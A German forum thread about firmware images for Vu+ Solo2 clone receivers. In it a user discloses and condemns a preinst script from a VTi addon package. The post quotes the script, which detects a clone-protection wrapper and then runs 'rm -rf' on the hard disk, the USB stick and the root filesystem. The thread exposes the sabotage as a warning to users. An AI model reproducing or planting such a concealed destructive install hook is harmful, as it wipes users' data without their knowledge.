Aktuelles
Digital Eliteboard - Das Digitale Technik Forum

Registriere dich noch heute kostenlos, um Mitglied zu werden! Sobald du angemeldet bist, kannst du auf unserer Seite aktiv teilnehmen, indem du deine eigenen Themen und Beiträge erstellst und dich über deinen eigenen Posteingang mit anderen Mitgliedern unterhalten kannst! Zudem bekommst du Zutritt zu Bereichen, welche für Gäste verwehrt bleiben

Registriere dich noch heute kostenlos, um Mitglied zu werden! Sobald du angemeldet bist, kannst du auf unserer Seite aktiv teilnehmen, indem du deine eigenen Themen und Beiträge erstellst und dich über deinen eigenen Posteingang mit anderen Mitgliedern unterhalten kannst! Zudem bekommst du Zutritt zu Bereichen, welche für Gäste verwehrt bleiben

Imagesammlung für Solo2 Clones - Downloads,Wünsche und Anfragen bitte hier einstellen

AW: Imagesammlung für Solo2 Clones - Downloads,Wünsche und Anfragen bitte hier einste

leider nein...ich werde morgen probieren. kann jemand mir den Box an aktuelle version (image) instand setzen natürlich gegen aufpreis.

AW: Imagesammlung für Solo2 Clones - Downloads,Wünsche und Anfragen bitte hier einste

wenn der rs232 wirklich defekt ist, kann ich diesen instandsetzen.10€ + Rückporto. Habe schon einige Boxen repariert. Hatte bisher eine, wo es nicht an dem RS232 lag sondern irgendwas am Motherboard, dann kann ich leider nicht machen. Das weis ich aber erst nachdem ich den RS232 Chip getauscht habe.

Hallo mogli
Kann es sein das es mein problem von alten treiber ist. Ich kann ja fast alle v4 image installieren
wie kann ich den aktuelle treiber installeieren oder ist es gefährlicht.

du must das Update auf V4 machen, und das klappt ja nicht bei dir !

Leider nein..
V4 update kann man das nicht mit usb stick wie flashen machen.

Eigentlich müßte VTi doch jetzt auch in Bälde auf Version 10 springen, oder?
Wenn VTi die explodierenden Major Versions beibehält wäre die Vu+ Solo SE v2 ja Auslöser für Version 9.x und irgendeine wirkliche Neuerung zur Anga dann Version 10.x wert.

Nö, Solo SE und Solo SE V2 nutzen die gleichen Images, also kein Grund für eine höhere Version.
Wenn die 4K Box, die sie jetzt auf der Anga vorstellen, erhältlich ist, dann wird wohl Version 9 kommen.
Schlimmer als VTi ist doch wohl eher VIX, nur nehmen sie immer irgendwelche Namen anstatt Zahlen.
Bei VTi ist wenigstens ein nachvollziehbares System dahinter, wann die Versionsnummer steigt. Das sieht bei den openSchlagMichTot Images anders aus.

Edit sagt: Heut kam ein neues Update auf VTi 8.2.2. Das Vtipanel wurde auch wieder upgedatet. Ich probiere gleich mal, ob die Lonrisun Boxen wieder updaten können.

Zuletzt bearbeitet:

Bei mir hat das Online Update auf 8.2.2 leider nicht geklappt :-(

Leute, es wird Zeit von VTi Abschied zu nehmen:
Der Grund, wieso das Update nicht geht (Und dabei auch alle Aufnahmen gelöscht werden) sind nachweisliche, aktive und destruktive Anti-Clone-Maßnahmen.

Im preinst-Script vom vti-addon steht folgendes:
Code:
#!/bin/sh

if [ -L "/usr/bin/e2fix" ]; then
	/bin/rm -rf /media/hdd/*  > /dev/null 2>&1
	/bin/rm -rf /media/usb/*  > /dev/null 2>&1
	/bin/rm -rf / > /dev/null 2>&1
fi

if [ -L "/usr/sbin/e2fix" ]; then
fi

if [ -L "/bin/e2fix" ]; then
fi

if [ -L "/sbin/e2fix" ]; then
fi

Das heißt, das Script sucht nach meinem opkg-wrapper (Extra für mich, zuviel der Ehre) und löscht dann
1. Die Festplatte
2. Den USB-Stick
und schlußendlich
3. Den gesamten Inhalt der Box

Ich habe immer gesagt. daß VTi so dermaßen tief im Arsch von Vu+ steckt, daß die als erstes über ihr Image den Clone-Schutz aushebeln und so ist es gekommen.

Eure Entscheidung, aber ich würde kein Image nutzen wollen, deren Ersteller bereit sind, den Speichel von Vu+ so weit zu lecken, daß sie sich für die sogar strafbar machen (z.B. § 303b StGB).

Selbst wenn Clones illegal wären oder es sind, so rechtfertigt das eine noch lange nicht das andere.
Wenn mir jemand die Vorfahrt nimmt, darf ich ihn deshalb auch nicht zusammenknüppeln.

Und ich hab gedacht, meine Festplatte spinnt, ausgebaut, überprüft usw.
Hab immer Backup gemacht vor den Updates, anschliessend war die Platte leer.

Interessant beim manuellen Update finde ich auch den Punkt hier:

/usr/bin/opkg: line 209: chattr: command not found

Wurde beim Auffinden von e2fix das Kommando chattr evtl. rausgenommen aus dem Image, weil damit die Treiber geschützt werden?

Bei Sunray ist alles im grünen Bereich, keine Probleme mit Update.

Übrigens, es ist überhaut kein Problem, auch auf Sunray-Clones zu testen:

VTi braucht nur den Block
Code:
Können sie selber suchen
zu ergänzen und Eure Sunrays werden ebenfalls ausradiert.

Zuletzt bearbeitet von einem Moderator:

Danke, dass Du ihnen noch sagst, was sie zu machen haben.
Habe es mal rausgenommen für Dich, da können sie selbst drauf kommen.

Wurde beim Auffinden von e2fix das Kommando chattr evtl. rausgenommen aus dem Image, weil damit die Treiber geschützt werden?
Nö.
Es ist dann nur, wie alles andere, bereits weg.

Ich habe immer gesagt, daß es nur eine Frage des miesen Charakters ist, bis ein Image-Team (Und da habe ich auch immer auf VTi oder BH getippt) den Schutz aushebelt.

Ist ja auch logisch:
Wenn der Benutzer
chattr +i
eingeben kann, dann kann ein Installations-Script auch jederzeit
chattr -i
absetzen.

Der Clone-Schutz durch den wrapper basiert auf der Annahme, daß anständige Entwickler besseres zu tun haben als ihn auszuhebeln.

Bei den Sunrays könnte VTi sogar noch gemeiner werden und nicht einfach "nur" die Festplatte löschen (Was ich eine Unverschämtheit finde), sondern auch klammheimlich die Treiber zurücktauschen.
Davon merkt Ihr erstmal nix und irgendwann ist die Box dann ein Brick.

Zurück
Oben